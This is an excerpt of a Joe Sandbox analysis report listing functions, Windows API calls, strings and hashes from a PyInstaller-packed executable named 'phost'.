                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC75959
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC7596B
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC75987
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC75999
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC759B5
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC759C7
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressErrorLastProc
                                                                                                                                                                                                                              • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                              • API String ID: 199729137-653951865
                                                                                                                                                                                                                              • Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                              • Instruction ID: ed7a3963f2ba6b22fca9b8c813b45cef6a5515a54ceb7c2da60ea6be0e7f8730
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9622B374B49F47D2FE159B5DAD241B423B4EF04BB9B84A035C82E86360EF3CB55AD206
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressErrorLastProc
                                                                                                                                                                                                                              • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                              • API String ID: 199729137-3427451314
                                                                                                                                                                                                                              • Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                              • Instruction ID: 4736c4785d45458d7ecd6ca510b826146a83199af77a7766b131d2ddab09aa15
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9702B270B0DB0BA1FE269B5DAD245B423B4BF44B79B44A031D41E862A4EF3CB559D313
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                              • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                              • Opcode ID: 20911a4744de1ae74720ed10c63f9e27e64b52a14b3e7d422bf6fbc438d91444
                                                                                                                                                                                                                              • Instruction ID: 6c96872fd3c04f717ddf50332f0eeaef5c0b80b224cbd514c2afb797666a725a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 20911a4744de1ae74720ed10c63f9e27e64b52a14b3e7d422bf6fbc438d91444
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E351B031B0864392EE119B199C105BA63B4FF44BB8F444635EE0C8B79ADF3CE549E342
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                              • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                              • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                              • Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                              • Instruction ID: 435f4a025f35b50c762097ba75f74c85a60dbf5e56131fa384c7f5d56b7105e0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A216D31B0CA4292EF558B7EAC641796274FF88FB4F489231DB2DC77A4DE2CD5958202
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: f$f$p$p$f
                                                                                                                                                                                                                              • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                              • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                              • Instruction ID: 82c32ab55855f988ffdff2a29f76f49eb6b8ef0311011d8bdfedf900cb599c49
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 24125461F0C18385FF269A19AC54A7B66F1EB807B4F984235D699C7BC4DF7CE4808B12
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                              • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                              • Opcode ID: 55d92bd675c4157705e5a4f9884447b9a563961a3e2da5c03b2098de834b5e21
                                                                                                                                                                                                                              • Instruction ID: 24ecff781c8b8fb6321770a5589483fa08ee505a70bf0e1b8ec60905d5b90bfd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55d92bd675c4157705e5a4f9884447b9a563961a3e2da5c03b2098de834b5e21
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE419131B1865292EE11DB19AC14ABA63B8FF44BE4F544531ED0CCB799DE3CE109D742
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetTempPathW.KERNEL32(?,?,00000000,00007FF62CC73CBB), ref: 00007FF62CC788F4
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00007FF62CC73CBB), ref: 00007FF62CC788FA
                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,00007FF62CC73CBB), ref: 00007FF62CC7893C
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC78A20: GetEnvironmentVariableW.KERNEL32(00007FF62CC7388E), ref: 00007FF62CC78A57
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC78A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF62CC78A79
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC882A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62CC882C1
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC72810: MessageBoxW.USER32 ref: 00007FF62CC728EA
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                              • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                              • Opcode ID: 6ea14b1c2d16789ddeaa0d8cc05df9935aa6d91fa7ad17376743f3d33dced37a
                                                                                                                                                                                                                              • Instruction ID: 7a4a8b3e2f65bae2bc4e16544f6c3f064f679bdbd2ccd38a7ae920dcf4e9da43
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ea14b1c2d16789ddeaa0d8cc05df9935aa6d91fa7ad17376743f3d33dced37a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A9418F21B1C64240FE25EB2DAD552BA12B4EF897E4F404131EE0DDB696EE3CE5099342
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF62CC8F11A,?,?,000001AE1B2296E8,00007FF62CC8ADC3,?,?,?,00007FF62CC8ACBA,?,?,?,00007FF62CC85FAE), ref: 00007FF62CC8EEFC
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF62CC8F11A,?,?,000001AE1B2296E8,00007FF62CC8ADC3,?,?,?,00007FF62CC8ACBA,?,?,?,00007FF62CC85FAE), ref: 00007FF62CC8EF08
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                              • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                              • API String ID: 3013587201-537541572
                                                                                                                                                                                                                              • Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                              • Instruction ID: ba84b8ed72b7d6acf3bd2c08ec4217b2942624cd64973867c96c84c2aeef3cd7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F4114A5B19A5282FF16CB1A9C1497622B1BF49BF0F884239ED1DC7384EF3CE4058342
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF62CC7DFEA,?,?,?,00007FF62CC7DCDC,?,?,?,00007FF62CC7D8D9), ref: 00007FF62CC7DDBD
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF62CC7DFEA,?,?,?,00007FF62CC7DCDC,?,?,?,00007FF62CC7D8D9), ref: 00007FF62CC7DDCB
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF62CC7DFEA,?,?,?,00007FF62CC7DCDC,?,?,?,00007FF62CC7D8D9), ref: 00007FF62CC7DDF5
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF62CC7DFEA,?,?,?,00007FF62CC7DCDC,?,?,?,00007FF62CC7D8D9), ref: 00007FF62CC7DE63
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF62CC7DFEA,?,?,?,00007FF62CC7DCDC,?,?,?,00007FF62CC7D8D9), ref: 00007FF62CC7DE6F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                                                                              • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                              • Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                              • Instruction ID: c999403295026f7ed86a3d74d52f8c8c4901220a9f0d82ff47d6f98e20ee00d3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE31A321B1AB4291EE229B0AAC0057523F8FF58BB4F595535ED1D8B3C0EF3CE4499356
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 995526605-0
                                                                                                                                                                                                                              • Opcode ID: 1e3bf3a8b1345e2c0c0bdd6ff4e06add0bb9355989cc78c5a669156b3459c754
                                                                                                                                                                                                                              • Instruction ID: c166246b85d03a646761b3896349f19c8ff6b633cd934497a3b87f2dd3d656c6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e3bf3a8b1345e2c0c0bdd6ff4e06add0bb9355989cc78c5a669156b3459c754
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F215E31B0CA4282EF109B59F85423AA7B4FF857B4F104235EAAD87AE5DE7CD4498701
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                              • String ID: CONOUT$
                                                                                                                                                                                                                              • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                              • Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                              • Instruction ID: 1b20762d8290de707d8bfdaacb36347c4d0dda70141b01bee13fbbf1d4457005
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B117231B18A4186EB608B5AAC6433972B0FB88BF8F004234D95DC7794DF7CD8148742
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF62CC79216), ref: 00007FF62CC78592
                                                                                                                                                                                                                              • K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF62CC79216), ref: 00007FF62CC785E9
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC79400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF62CC745E4,00000000,00007FF62CC71985), ref: 00007FF62CC79439
                                                                                                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF62CC79216), ref: 00007FF62CC78678
                                                                                                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF62CC79216), ref: 00007FF62CC786E4
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,00000000,00007FF62CC79216), ref: 00007FF62CC786F5
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,00000000,00007FF62CC79216), ref: 00007FF62CC7870A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3462794448-0
                                                                                                                                                                                                                              • Opcode ID: b2770b171440e78660be4c91fda42c27049aa369c6710ced6bdf6821ec2ad01d
                                                                                                                                                                                                                              • Instruction ID: 14c4aed2e1edbb137f0b8f72aa0ff2fcdbd1536768575b5cb22cfd846b2f31ee
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b2770b171440e78660be4c91fda42c27049aa369c6710ced6bdf6821ec2ad01d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F2419322B1868241EE709B19A9406BA63B8FF84BE4F440135EF4DEBB89DE3CD445D702
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC78760: GetCurrentProcess.KERNEL32 ref: 00007FF62CC78780
